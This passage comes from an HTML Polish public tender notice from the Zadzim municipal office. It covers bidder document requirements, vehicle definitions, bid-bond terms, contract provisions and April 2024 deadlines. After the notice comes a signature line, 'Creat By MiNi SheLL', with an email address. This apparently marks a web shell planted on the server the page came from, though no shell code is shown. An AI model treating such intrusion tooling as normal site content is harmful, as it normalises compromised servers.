wykorzystujący do napędu wyłącznie energię elektryczną<br/>akumulowaną przez podłączenie do zewnętrznego źródła zasilania – jest to pojazd inny niż pojazd hybrydowy (który<br/>posiada napęd spalinowo-elektryczny, w którym energia elektryczna jest akumulowana przez podłączenie do zewnętrznego<br/>źródła zasilania) Przez pojazd napędzany gazem ziemnym rozumie się pojazd samochodowy (zgodnie z ustawą Prawo o<br/>ruchu drogowym) wykorzystujący do napędu sprężony gaz ziemny (CNG) lub skroplony gaz ziemny (LNG), w tym<br/>pochodzący z biometanu, oraz posiadający (a) silnik jednopaliwowy albo (b) silnik dwupaliwowy typu 1A, który pracuje w<br/>części gorącej cyklu testu dynamicznego ze średnim wskaźnikiem zużycia gazu nie niższym niż 90% oraz który na biegu<br/>jałowym nie zużywa wyłącznie oleju napędowego i nie posiada trybu pracy silnika zasilanego wyłącznie olejem napędowym<br/>w innym trybie pracy pojazdu niż serwisowy lub awaryjny występującym w fabrycznej instalacji gazowej, z którą<br/>homologowany jest pojazd albo, w przypadku silnika o zapłonie iskrowym, który posiada awaryjny zbiornik benzyny<br/>silnikowej o pojemności nie większej niż 15 litrów – oznacza to, że pojazdy napędzane gazem LPG nie są pojazdami<br/>napędzanymi gazem ziemnym.<br/>- Wykonawca wykaże, że dysponuje wytwórnią masy bitumicznej lub przedstawi pisemne<br/>zobowiązanie innych podmiotów o dostawie mieszanki z wytwórni.<br/>– załącznik nr 13 do SWZ.<br/>- Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.<br/>- Polisę ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia; minimalna suma gwarancyjna ubezpieczenia 7 000 000,00 zł. (słownie: siedem milionów złotych brutto). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> - Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji.<br/>- Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy PZP o braku przynależności do tej samej grupy<br/>kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz.<br/>1086) z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu<br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 7<br/>- Wskazanie części zamówienia, których wykonanie Wykonawca zamierza powierzyć Podwykonawcom i podanie przez<br/>Wykonawcę firm Podwykonawców – załącznik nr 8 do SWZ.<br/>- Zobowiązanie podmiotu udostępniającego zasoby<br/>- Zobowiązanie podmiotów, na zdolnościach lub sytuacji których Wykonawca polega, do oddania mu do dyspozycji<br/>niezbędnych zasobów na potrzeby realizacji zamówienia – załącznik nr 6 do SWZ.<br/>- Oświadczenie o wykształceniu i kwalifikacjach - Załącznik nr 9.<br/>- Oświadczenie o aktualności informacji zawartych w oświadczeniu art. 125 ust.1 ustawy - Załącznik nr 10.<br/>- Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem<br/>podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem,<br/>a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu<br/>albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami<br/>lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności.<br/>- Zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych<br/>lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art.<br/>109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem<br/>zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności<br/>należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące<br/>porozumienie w sprawie spłat tych należności<br/>- Oświadczenie Wykonawców wspólnie ubiegających <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości 90 000,00 zł (słownie: dziewięćdziesiąt<br/>tysięcy złotych),<br/>- Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania<br/>ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>- Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>- Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu oryginał<br/>gwarancji lub poręczenia, w postaci elektronicznej.<br/>- Wadium wnoszone w formie pieniądza należy wpłacić przelewem na rachunek bankowy<br/>Zamawiającego Nr: 24 9263 0000 8000 0042 2008 0007 Bank Spółdzielczy w Poddębicach.<br/>- Wadium wniesione w pieniądzu musi znajdować się na koncie Zamawiającego przed upływem terminu składania ofert.<br/>Termin wniesienia wadium jest zachowany tylko wtedy, gdy uznanie rachunku bankowego Zamawiającego (wpływ pieniędzy<br/>na rachunek bankowy) nastąpi przed upływem terminu składania ofert.<br/>- Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>- Wadium wnoszone w formie poręczeń lub gwarancji musi spełniać<br/>co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w<br/>ustawie Pzp;<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta<br/>do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa<br/>oraz numer przedmiotowego postępowania;<br/>6) określać Beneficjenta – Zamawiającego;<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy Pzp), Zamawiający<br/>wymaga aby poręczenie<br/>lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>- W przypadku wniesienia wadium w formie:<br/>1) pieniężnej - zaleca się, by dowód dokonania przelewu został dołączony<br/>do oferty;<br/>2) poręczeń lub gwarancji - wymaga się, by oryginał dokumentu został złożony wraz z ofertą.<br/>- Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie<br/>do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3<br/>ustawy Pzp zostanie odrzucona.<br/>- Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie<br/>7 dni od dnia wystąpienia jednej z okoliczności przedstawionej w art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy występujący wspólnie są<br/>zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w<br/>postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Wykonawca udzieli Wykonawcy zaliczki na poczet wykonania zamówienia w wysokości 5% wynagrodzenia brutto. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość dokonywania zmian umowy w granicach wyznaczonych przepisami ustawy Pzp, w tym<br/>art. 455 ustawy Pzp oraz w zakresie i na warunkach określonych w ogłoszeniu o zamówieniu oraz wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Urząd Gminy w Zadzimiu Zadzim 44, 99-232 Zadzim</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com